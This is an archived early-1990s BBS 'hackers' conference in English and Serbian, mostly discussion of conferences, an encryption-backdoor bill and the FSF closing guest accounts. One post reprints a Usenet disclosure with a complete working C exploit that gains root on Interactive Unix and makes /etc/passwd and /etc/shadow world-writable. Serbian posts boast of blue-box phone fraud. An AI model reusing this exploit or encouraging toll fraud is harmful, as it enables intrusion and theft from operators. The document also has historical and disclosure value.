This is a comment to message 831.
--------------------------
Years ago I read about blue boxes and how they could fool the
phone company's equipment. BC was the hub of security
violation because our equipment up here was so antiquated.
Newer equipment has better security controls.
hackers.67dejanr,
==========================
tojerry/hackers #730, from harryg, 210 chars, Mon Nov 19 15:19:38 1990
There is/are comment(s) on this message.
--------------------------
TITLE: Hackers '90
I'd certainly appreciate hearing about the just ended Hackers'90
gathering. jerryp, ssatchell, bjc and wardc were among the elect this
year. What can you share with us?
Thanks! ....Harry
==========================
tojerry/hackers #731, from bwebster, 1465 chars, Mon Nov 19 16:05:05 1990
This is a comment to message 730.
--------------------------
Dunny if I'm among the elect, but I was at the conference. :-) Here's a
first pass.
The location was different than in previous years; instead of a summer camp
facility outside of Saratoga, the conf was held at the Granlibakken resort
at Lake Tahoe. Food, facilities and service were all excellent.
Highlights (for me, anyway) included the sessions on socially significant
hacker, user interface, and the EFF (Electronic Frontier Foundation); hearing
more (and more accurate) details about the Secret Service's raid on Steve
Jackson Games (Steve was there at the conference); previewing "Hyperland",
a one-hour BBC production about agents and hypermedia, written by Douglas
Adams and starring him and Tom Baker; seeing tape of Clifford Stoll's
(_The Cuckoo's Egg_) testimony before a House committee on computer
network security (talk about paradigm clashes!); Danny Hillis' presentation
showing development of a simple network sorting algorithm via natural
selection and cross-breeding of 64,000 versions running in paralell;
catching up with old friends and making new ones.
Disappointments included some of the other sessions (object-oriented
programming, development tools, prophecies), not as much nifty hardware
and software as in past years, and not enough fresh faces or ideas.
Tremendous credit must go to Glenn Tenney and the rest of the Hackers
staff (including Brett Glass) for putting together an excellent
conference at a great site. ..bruce..
hackers.68dherceg,
:> Evo jednog teoretskog pitanja:
- sedneš za računar, odeš u Sezam, izabereš pakovanje neke velike
konferencije od nekih 600-700Kb, i dok PkZip radi, ti prekineš vezu.
Šta s▀e tada dešava?
hackers.69vkrstonosic,
>> :> Evo jednog teoretskog pitanja:
>>
>> - sedneš za računar, odeš u Sezam, izabereš pakovanje neke velike
>> konferencije od nekih 600-700Kb, i dok PkZip radi, ti prekineš vezu.
>>
>> Šta s▀e tada dešava?
Dobiješ poruku NO CARRIER i moraš da zoveš ponovo.
A Sezam se grdno nasekira, označi da nisi pročitao nove poruke i sačeka
sledećeg korisnika. Nisi valjda mislio da oboriš Sezam ???
hackers.70dejanr,
==========
unix/att_derived #3620, from pbash, 6734 chars, Wed Feb 13 01:48:00 1991
Comment to 3618. Comment(s).
----------
RE: Gaping ISC Security hole
The following article was posted on USENET describing a security hole
in ISC UNIX and those versions of UNIX derived from this base code.
While it was originally described as a problem on systems with *no
co-processor*, at least one other site reported the following code
attaining root status on a 486 machine. Personally, with all of the
publicity on this, I can't believe ISC, and others, won't have a fix
for this ASAP. Enjoy.
-------------------------------------------------------------------
Article 4278 of comp.unix.sysv386:
Path:
glacier!stcvax!ico!ism.isc.com!ispd-newsserver!rpi!zaphod.mps.ohio-state.e
du!wuarchive!uunet!fub!dobag.in-berlin.de!lumpi
From: lumpi@dobag.in-berlin.de (Joern Lubkoll)
Newsgroups: comp.unix.sysv386
Subject: SECURITY BUG IN INTERACTIVE UNIX SYSV386
Summary: IS VERY BAD !
Keywords: BAD BUG
Message-ID: <KR3NBQQ@dobag.in-berlin.de>
Date: 11 Feb 91 13:30:53 GMT
Article-I.D.: dobag.KR3NBQQ
Posted: Mon Feb 11 06:30:53 1991
Organization: Dobag Computer Systems Berlin
Lines: 155
It was a long process of thoughts about this, but now, after half
a year of disput with interactive, here it finally is:
--- jl
Hello you at Interactive Systems Coporation !
it seems that your very cute interactive unix System has a nice bug !
EVERYONE you has access to a shell and a compiler or an interactive
System at home (to upload binaries) CAN BECOME ROOT.
It seems that you programmers aren't able to programm the 386 protected
mode correct. It exists the possibillity to write protect segment and
pages... It would be very useful to write protect the internatl data-
structures whicht the system uses to store information about the user.
Offering the ability to write in these segments is just like offering
CIA - Identity cards per mail-order for everyone (SALE $5).
If you don't believe... try the litte program down there and you'll see !
I didn't believe it either but ... see yourself !
I expect bug-fixes immediatly or my money back for the interactive
system... VERY soon please !
I have had a lot of conversation with 'Intra Unix' in Germany and a
lot of people at 'ico.isc.com' about the problem. They just told
me this being a only a 'feature' not a bug !
Simply said, it is a bug in the coprocessor emulation code, which
will allow system without a co-cpu to be broken, just because some
programmers aren't able to allocate their own buffers :-)
If you have a co-cpu and Release >= 2.2 you may set the kernel tuneable
parameters UAREAUS and UAREARW to 0 to protect yourself.
Dobag does not have this problem, due to it being a 486 System, but
there will be a lot of systems without a co-cpu !
There is only one way to fix this problem: Phone Interactive or your
Distributor and get very angry !
Next follows toete.c, the program to kill any isc system not being
equipped with a co cpu.
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
/* If you use Interactive Unix 2.2 uncomment the following line */
/* #define ISC22 */
#include <stdio.h>
#ifdef ISC22
#include <sys/limits.h>
#include <sys/unistd.h>
#else
#include <limits.h>
#include <unistd.h>
#endif
#include <sys/sysi86.h>
#include <sys/signal.h>
#include <sys/types.h>
#define ushort unsigned short
#define ulong unsigned long
#include <sys/fs/s5dir.h>
#include <sys/user.h>
main()
{
struct user *dumm;
/* 0xE0000000 is the virtual adress of the ublock for the current
running programm. */
dumm = (struct user *) 0xE0000000;
/* Here we are so kind to change our effective and real user id
to zero, which means, that we can do whatever we want... */
dumm-> u_uid = 0; /* A well programmed system has to give a
segmentation oder protection violation
error at this line. But don't expect
Interactive Unix to do so... */
dumm-> u_gid = 0;
dumm-> u_ruid = 0;
dumm-> u_rgid = 0;
/* What would be the first thing you want to do if you become root
on another system ? */
chmod ("/etc/passwd",(int) 0666);
chmod ("/etc/shadow",(int) 0666);
/* If you don't believe what I say, uncomment the following line: */
/* execl("/bin/sh","sh","-c","/bin/ls -l /etc/passwd",(char *) 0); */
}
--- END OF toete.c ---
JUST HAVE FUN !
mfg. JL
--
lumpi@dobag.in-berlin.de -- "Nothing is the complete absence of everything."
hackers.71vzivkovic,
Zdravo!
Danas sam dobio shemu i 'blueprints' za uredjaj zvani BLUE BOX, koji pomocu
zvuka od par hiljada Hz, prevari postu, i misli da je veza prekinuta, a u
stvari nije... i tako moze da se neograniceno razgovara (modemise) a da
telefonski racun bude minimalan...
Drugim recima, BLUE BOX omogucava FREE CALLS ili besplatne pozive...
Uredjaj je veoma popularan i zakonom zabranjen, a moze biti otkriven jedino
ukoliko dodju kod tebe i vide ga - nikako drugacije...
Pomocu dobijene sheme, nece biti tesko napraviti BLUE BOX....
Da li je jos neko imao prilike da se sretne sa izrazom BLUEBOXing, ili je
negde cuo nesto o tome?
Pozdrav,
Vladimir
hackers.72ivujanic,
>>Danas sam dobio shemu i 'blueprints' za uredjaj zvani BLUE BOX,
koji
>>pomocu zvuka od par hiljada Hz, prevari postu, i misli da je veza
>>prekinuta, a u stvari nije... i tako moze da se neograniceno
razgovara
>>(modemise) a da telefonski racun bude minimalan...
Jedini je problem da li to radi na našim impulsnim centralama u
šta
čisto sumnjam, jer je to američki fazon, a tamo su centrale tonske,
tj.
telefoni pevaju umesto da seckaju...
Ivica
hackers.73ppekovic,
>> Jedini je problem da li to radi na našim impulsnim centralama
>>u
>>šta
>>čisto sumnjam, jer je to američki fazon, a tamo su centrale tonske,
>>tj.
>>telefoni pevaju umesto da seckaju...
Da kucnem u drvo i kod nas ima sve više "tonskih" centrala. Pitaj
vkrstonosic-a ako ne veruješ. Pi-pu-pi-pa-pe riiiiiingg ;((( šmrc, kadće to
stići u moje pasivne krajeve ;(((
Paya
hackers.74vzivkovic,
Da, stvar RADI! i na nasim centralama i to veoma uspesno...
:)))))))) Nema vise kilometarskih tel. racuna!
hackers.75lanik,
>> Danas sam dobio shemu i 'blueprints' za uredjaj zvani BLUE BOX,
>> Drugim recima, BLUE BOX omogucava FREE CALLS ili besplatne pozive...
Koliko tražiš za tu šemu????? ;)))))))
--> Keyboard? How Quaint! <--
hackers.76dejanr,
>> Da, stvar RADI! i na nasim centralama i to veoma uspesno...
Kako znaš? Mislim, znaćeš tek kad stigne račun.
Uzgred, ne znam koliko je besplatno telefoniranje dovoljan razlog
za "nemiran san" jer ipak nije ni pošta baš luda pa da to ne može
otkriti - pogotovu ako jednom uzme maha. A čak i ako ne otkrije,
kršenje zakona je ipak kršenje zakona.
PS Znaš li kako Elektrodistribucija otkriva one koji "kradu struju"?
Vrlo jednostavno - najčešće ih prijavi komšija ;) Takav smo narod.
hackers.77vzivkovic,
Na zalost, nije na prodaju!
hackers.78vzivkovic,
Nazalost, ta pojava 'otkucavanja' mi je poznata, pa vise necu ni da govorim o
BB-u da se ne bi izdao :)...
Nego, sigurno radi jer imam prijatelja u posti koji moze da vidi kako mi
'kucaju' impulsi kada razgovaram, a kada sam koristio BB, impulsa nije ni bilo!
Pozdrav,
Vladimir
hackers.79dejanr,
Mislim da je i ovde bilo reči o izvesnom George-u Powellu i njegovim
hakerskim "poduhvatima". Evo kako se priča završava:
:show resume yllar.17
yllar.17, George Powell, Danville, IL
Last on: Sat Apr 20 17:03:53 1991
Goodbye all.........
This will be the last anyone heres from me in computer land. Since my
arrest for hacking/fraud, ive gotten myself in such a mess that the possibility
of ever getting out, is now only a dream. Ive decided to abandon computers and
the telcom world. Many thanx for the great times ive had on bix and the other
places ive known. Bixbilling has been informed to cancel this account.
Crying myself to sleep every night, I always think how so much different
things could have been. I had so much of a possibility, a decent job waiting, a
education and life was fun. Now thing are so different, I have no possibility
of a good job, my past follows me, and i can't escape it, now im just a felon
with a criminal record. Months pass, and it just gets worse, my parrents are
dying, my job is going no where, and the money i do make goes for debts. Fun is
only a memory, i work, and i sleep, that's my life. At least when i am gone,
the memories will remain, and hopefully someone will remember me, and maby not
get themselves into the mess i have. I had it all, but I just threw it away.
hackers.80dejanr,
==========
security/main #1201, from epbh, 1367 chars, Fri Apr 26 09:53:11 1991
Comment(s).
----------
According to Network World there is a provision in a bill now before Congress
which recommends that carriers and equipment makers provide the government
with the means to decode encrypted communications.
The provision does not detail how suppliers would provide such capabilites
but the article goes on to speculate that it would probably invlove the
development of electronic trapdoors or master keys that could be used to
decrypt data, voice, or video communication without a user's permission.
Backers of the provision say it will help the government combat terrorist
and criminal organizations that are using sophisticated encryption systems.
The article goes on to quote Eddie Zeitler, vice-president for information
security services at Fidelity Investments in Boston. "It would severly limit
the usefulness of encryption. Over time, you would no longer know who has
the trapdoor or keys. Security could not be assured."
The provision is contained in a counterterrorism bill introduced by Sen.
Joseph Biden, (D-Del.) in January. It reads:
"It is the sense of Congress that providers of electronic communications
services and manufacturers of electronic communications equipment shall ensure
that communications systems permit the government to obtain the plain text
contents of voice, data, and other communications when appropriately
authorized by law."
==========
security/main #1202, from roedy, 300 chars, Fri Apr 26 10:03:53 1991
Comment to 1201. Comment(s). More refs to 1201.
----------
given that terrorists or even environmental organizations
can use their own algorithms, even 1-write uncrackable
ones, this requirement to me seems futile -- only allowing
snooping on low security business traffic.
It ranks up there with the silly export restrictions on the
Published DES algorithm.
==========
security/main #1204, from hshubs, 170 chars, Fri Apr 26 16:39:18 1991
Comment to 1201. Comment(s). More refs to 1201.
----------
I'm totally against this idea. It makes encryption totally useless, and
allows the government to spy easier. If they wish to spy, let them really
work _*HARD*_ at it.
==========
security/main #1205, from m.bradley, 106 chars, Fri Apr 26 23:16:10 1991
Comment to 1204. Comment(s).
----------
Same here. Could anyone post the bill number so those inclined can write
their Congresscritter about it?
==========
security/main #1206, from hshubs, 158 chars, Fri Apr 26 23:19:03 1991
Comment to 1205. More refs to 1205.
----------
BTW, don't let my opinions stop anyone from disagreeing if they wish. If
you disagree, please say so, and say _why_. If I'm wrong, I wish to know
it. :-,
==========
security/main #1207, from roedy, 164 chars, Fri Apr 26 23:26:29 1991
Comment to 1205. Comment(s).
----------
I think I know what this bird is up to. He is being bribed
by some out of work security companies to stimulate business
setting up new private encryption schemes.
==========
security/main #1208, from hshubs, 121 chars, Fri Apr 26 23:42:47 1991
Comment to 1207.
----------
Then there's the company talked about in 'microbytes/items #1512', which
is going about it in a somewhat different way.
==========
security/main #1209, from dave2, 295 chars, Sat Apr 27 00:51:35 1991
Comment to 1201.
----------
Yeah. Throw everything out the window - just gun 'em down in cold
blood if they look like terrorists. Why take a chance?
Looks like the "War on Drugs" is subsiding while the "War on Terrorism"
is being pushed. Hoo, boy. I'm already down as a "known or suspected
terrorist" in five states.
==========
security/main #1210, from yllar.17, 183 chars, Sat Apr 27 04:35:41 1991
Comment to 1202. Comment(s).
----------
silly is for sure...like someone who is into that sorta nasty
stuff is really gonna abide by the law in the first place...
they are just wasting their breath and energy...
L8tr
:(
==========
security/main #1211, from hamilton, 963 chars, Sat Apr 27 10:50:47 1991
Comment to 1210.
----------
It's worse than that: underlying a provision like this is the notion
that somehow the government should have this right to open up anyone's
mail or data on some pretext of fighting drugs or some similar nonsense.
I will tell you that the most terrifying part of this "war on drugs" is
not the drugs themselves but rather the unprecedent assault now being
waged on our civil liberties. Even more sickening is to realize that
this tragic loss is not even delivering the promised benefits: drugs
and crime are not being reduced in any meaningful way. Only an
ideologue could support the war on drugs without insisting on a fair
accounting to see that it works.
Every day I come a bit closer to being convinced that even the most
ardent supporters of the war on drugs know that it is a failure. And
I come a bit closer to being convinced their mission is not the eradication
of drugs but simply the creation of a police state. Drugs are merely
a cover story.
hackers.81dejanr,
==========
security/long.messages #117, from hshubs, 6072 chars, Wed Aug 7 00:48:53 1991
----------
Msg#:49475 *BCS_OLSC*
06/13/91 14:24:03
From: OFER INBAR
To: HOWARD SHUBS
Subj: THE FSF GUEST ACCOUNT
On the subject of the Free Software Foundation and their decision (Stallman was
the only dissenting vote) to close the guest account, here's an open letter
from Noah Friedman, FSF accounts administrator:
Date: Wed, 5 Jun 91 08:25:36 edt From: friedman@gnu.ai.mit.edu Subject: An open
letter
The following is a personal essay and clarification of some of the things
that have been going on around the FSF. To some extent, IRC has been affected
by what we do. This is not an official statement by the FSF and the opinions
expressed here are not necessarily representative of the organization as a
whole or of any of its members (except for myself).
But first, a statement of fact. The user "belladona" (tami@gnu.ai.mit.edu)
on IRC has not, and never did, give the root password to the FSF machines to
anyone on IRC. She was teasing naive people who asked for the root password by
giving them false ones. Some of these characters were naive enough to go
around walloping "Hey! I've got the root password!" without even checking to
see if it worked. And it doesn't help that apparently clueful (I guess I was
mistaken) people went around spreading this rumor without checking their facts.
Our machines are (were) not particularly secure. It was trivial to obtain
root access without the password.
Friday afternoon, around 3:00 PM, staff members in the office pulled the FSF
machines off the net, turned off all accounts and made the machines a bit more
externally secure. There was no warning given to guests, staff, or volunteers
working from remote sites.
Starting a month or two ago the amount of destructive and annoying behavior
by some of the FSF guests began to increase. We received complaints from all
over the country about some of our guests breaking into remote sites, sending
abusive mail is massive quantities, and harassing users on IRC. Probably these
same guests were also responsible for deleting files on our systems and
bringing our machines down so that they were completely unusable.
The staff members who work in the Cambridge office and the board of
directors (with the exception of Richard Stallman, who wishes it to be known
that he does not agree with or accept the decisions we made) decided that it
would probably be necessary to remove the anonymous open accounts from our
systems. We discussed plans for doing so, but only by voice or in person. We
had to implement "email-silence" because we knew that some of the crackers on
our systems were reading our mail. It would not have been a good idea to let
them on to what we were up to. I hope this explains why we were unable to warn
people what was about to happen.
Friday afternoon someone (possibly more than one person) did something so
pointlessly destructive that the people in the office decided to carry out the
actions we had planned on for a later date. I won't go into the details. The
people who are responsible know what I'm talking about.
This won't affect our policy of giving people guest accounts. We like
having guests on our machines and I know that many, many people have benefitted
by the fact they they can use them. Of the hundreds (possibly thousands) of
New mail on node UBBG from UBBG::EPANTIC "Srdjan Pantic ETF Beograd
YU"people who used our machines, probably only 6 or 7 caused any trouble.
Unfortunately, these 6 or 7 people were persistent enough and obnoxious enough
to spoil things for everyone else.
All we've done at this point is to remove the anonymous accounts, and
disabled the other accounts until users can change their passwords. The
crackers had modified various programs on the system and recorded the passwords
of most of the accounts, and this makes it necessary to insure that teyae
changed before the accounts are re-enabled. Hopefully, this policy will allow
us to restrict access to our machines by people who are bent on causing damage.
We do not encourage cracking. We never did. Our open access policy was
originally a way of expressing to crackers that they didn't need to be
antisocial and that "breaking in" wasn't necessary. We welcomed them (along
with anyone else who knew about us) to use the computers here and tried to
encourage them to do something constructive. A lot of the time we succeeded.
The FSF has always tried to encourage people to do beneficial and
constructive things. That's why the GNU project was started. The idea was to
provide a complete operating system which everyone could use as a base for
writing and sharing software freely. At the same time, the FSF wanted to teach
people that it was possible to share computing resources in an open environment
where people worked toward improving the system as a whole. While the two
issues are not completely intertwined such that one without the other is
impossible, they are reflections of the same general philosophy. Security is
an obstruction which prevents people from doing this "without permission." By
removing our anonymous accounts we now say to the world "we have to assume that
everyone is guilty and untrustworthy until further inspection." What a sad
statement about human nature that is!
To the people who contributed to forcing us to change the way we think,
thanks heaps. You've caused more damage and unhappiness than you can possibly
imagine.
---
Noah Friedman friedman@gnu.ai.mit.edu System administrator, Free Software
Foundation
(PS: if you're thinking of asking for an account at this point, don't. There is
too much work to do at the moment for anyone to take the time to make them.)
--------------------------------------------------------------------
BTW, the "something so pointlessly destructive" mentioned in the above letter
was, I think, when someone deleted their entire mail spool (that is, everyone's
unread email).
-- Cos (Ofer Inbar) -- cos@chaos.cs.brandeis.edu
-- WBRS (100FM) -- WBRS@binah.cc.brandeis.edu WBRS@brandeis.bitnet
--- TMail v1.20
* Origin: BCS IBM UG TBBS, 617-332-5584 (1:101/310)
hackers.82djelovic,
Rezultati zvanja broja 533-333
Ja: Dobar dan, je li to PTT?
On: Dobar dan, jeste.
Ja: Zanima me procedura za prelazak na tonsko biranje.
On: Jeste li vec prikljuceni ili treba da podnesete zahtev.
Ja: Zahtev.
On: A odakle vam ovaj broj telefona?
Ja: Dao mi je prijatelj.
On: Pa neka se onda javi taj prijatelj da malo popricamo.
Ja: Ne razumem, u cemu je problem?
On: Pa obicno to ne dajemo, ali ako se javi taj kolega mogli bi to da
sredimo. Znate, upisemo tamo (...), i sve bude u redu.
Ja: Hvala vam i dovidjenja.
On: Dovidjenja (jel se ovo pise zajedno ili odvojeno?).
Ja: <klik>
On: <klik>
Ja: <smrc>
hackers.83vojkan,
Juče sam slučajno obrnuo neki tel broj i javilo se neko
pišatanje. Ja naravno pokušah ponovo sa modemom i
nemogoše da se prepoznaju zvučalo je kao neki drugi
format prenosa (drugaćiji odo ovog klasićnog) tako
da ću pokušati da to sredim. Evo i telefona ako je
ko slućajno zainteresovan 627-657.
Vojkan
hackers.84dejanr,
>> Juče sam slučajno obrnuo neki tel broj i javilo se neko
>> pišatanje. Ja naravno pokušah ponovo sa modemom i
Verovatno je fax.
hackers.85magician,
=> Juce sam slucajno obrnuo neki tel broj i javilo se neko
=> pisatanje. Ja naravno pokusah ponovo sa modemom i
=> nemogose da se prepoznaju zvucalo je kao neki drugi
=> format prenosa (drugaciji odo ovog klasicnog) tako
=> da cu pokusati da to sredim. Evo i telefona ako je
=> ko slucajno zainteresovan 627-657.
Ccc... Mi ovde pricamo i o FAX karticama a ti jos nisi cuo ni kako
zvuci obican telefax... :(
MAGICIAN
P.S.
Svidja mi se sto si ovo stavio u temu 'hackers' :)
hackers.86vojkan,
-> Svidja mi se sto si ovo stavio u temu 'hackers' :)
Da imaš pravo baš lepo zvuči ;)